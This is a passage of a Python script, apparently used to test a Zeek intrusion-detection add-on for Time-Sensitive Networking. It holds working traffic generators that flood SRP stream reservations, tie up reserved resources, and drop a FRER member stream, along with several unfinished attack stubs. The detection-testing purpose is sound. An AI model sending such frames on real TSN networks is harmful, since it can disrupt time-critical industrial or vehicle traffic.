    """ Sends multiple member stream, belonging to the same compound stream. After some time one stream stops """
    global sequence_nr
    start_time = time.time()
    for _ in range(5):
        send_cb(interface_name, sequence_nr, nr_of_member_streams)
        sequence_nr += 1
        time.sleep(1 - ((time.time() - start_time) % 1.0))  # schedule close as possible to 1 sec
    for _ in range(70):
        send_cb(interface_name, sequence_nr, nr_of_member_streams - 1)
        sequence_nr += 1
        time.sleep(1 - ((time.time() - start_time) % 1.0))
    # there is actually a FRER event exactly for that, SIGNAL_LATENT_ERROR, it is not defined what
    # happens with this event or after what time/ difference it gets triggered.
    # It should be possible for a FRER component to send a msg to a Zeek component.
    # So there is no actual need to implement that in Zeek


# Attack 7 - What is to many in what time? higher than x msg/second? - Done
def attack7():
    """ Send many SRP reservations in short time. The first half is for different streams, the second for the same
    stream """
    frames = []
    for i in range(100, 105):
        frames.append(SRP(
            tlvlist=[
                Talker(
                    tlvlist=[
                        StreamID(MacAddress="00:00:00:00:00:02", UniqueID=i),
                        StreamRank(),
                        TrafficSpecification(),
                        UserToNetworkRequirements()
                    ]
                ),
                Status(
                    tlvlist=[
                        StatusInfo(),
                        AccumulatedLatency()
                    ]
                ),
            ]
        ))
    send_srp(frames)
    time.sleep(10)
    frames = []
    for _ in range(100, 105):
        frames.append(SRP(
            tlvlist=[
                Talker(
                    tlvlist=[
                        StreamID(MacAddress="00:00:00:00:00:02", UniqueID=108),
                        StreamRank(),
                        TrafficSpecification(),
                        UserToNetworkRequirements()
                    ]
                ),
                Status(
                    tlvlist=[
                        StatusInfo(),
                        AccumulatedLatency()
                    ]
                ),
            ]
        ))
    send_srp(frames)
    # send many SRP reservations in a short time for same StreamID


# Attack 8 - Allocated but unused resources - Done
def attack8():
    """ Sends a single SRP reservation and waits until timeout occurs """
    # No need to fill out complete message, as it just creates an entry for streamID config
    srp_frame = SRP(
        tlvlist=[
            Talker(
                tlvlist=[
                    StreamID(MacAddress="00:00:00:00:00:02", UniqueID=99),
                    StreamRank(),
                    TrafficSpecification(),
                    UserToNetworkRequirements()
                ]
            ),
            Status(
                tlvlist=[
                    StatusInfo(),
                    AccumulatedLatency()
                ]
            ),
        ]
    )
    send_srp(srp_frame)
    time.sleep(60)
    # send srp msg, reserving resources, wait ???unused or far under reserved bandwidth


# Attack 9 - Violating SRP resource allocation restricted by a threshold
def attack9():
    pass
    # ???What kind of threshold for which values???


# Attack 10 - Logging SRP resource allocation deviating from previous allocations so much. Not SRP but Netconf
# SRP handles mostly requests and answers.
def attack10():
    pass
    # ???Compare to last msg for same StreamID? or compare to current configuration???
    # Are there relevant data points that are not allowed to change?
    # In case of failed SRP request CUC could reform requirements
    # So only if accepted Request gets changed again?


# Attack 11 - Inconsistencies between SRP QoS requirements with reserved CB paths
def attack11():
    pass
    # ???What? Like it uses less than what it says it needs? can it even use more, when bridges are configured?
    # Does a bridge guarantee at least n mb/s or are there upper bounds???


# Attack 12 - Violating link capacity for certain traffic type
def attack12():
    pass
    # ???not sure on how I would measure that???


# Attack 13 - Attempts for changing an existing resource allocation for a certain stream
def attack13():
    pass
    # send SRP msg with config
    # send SRP msg with config for the same streamID
    # This would be the same as attack 10
    # Keep track of state/ keeping old msgs would be easier and make StreamID key


if __name__ == "__main__":
    # prepare stuff here
    interact(mydict=globals(), mybanner="Test add-on TSN")

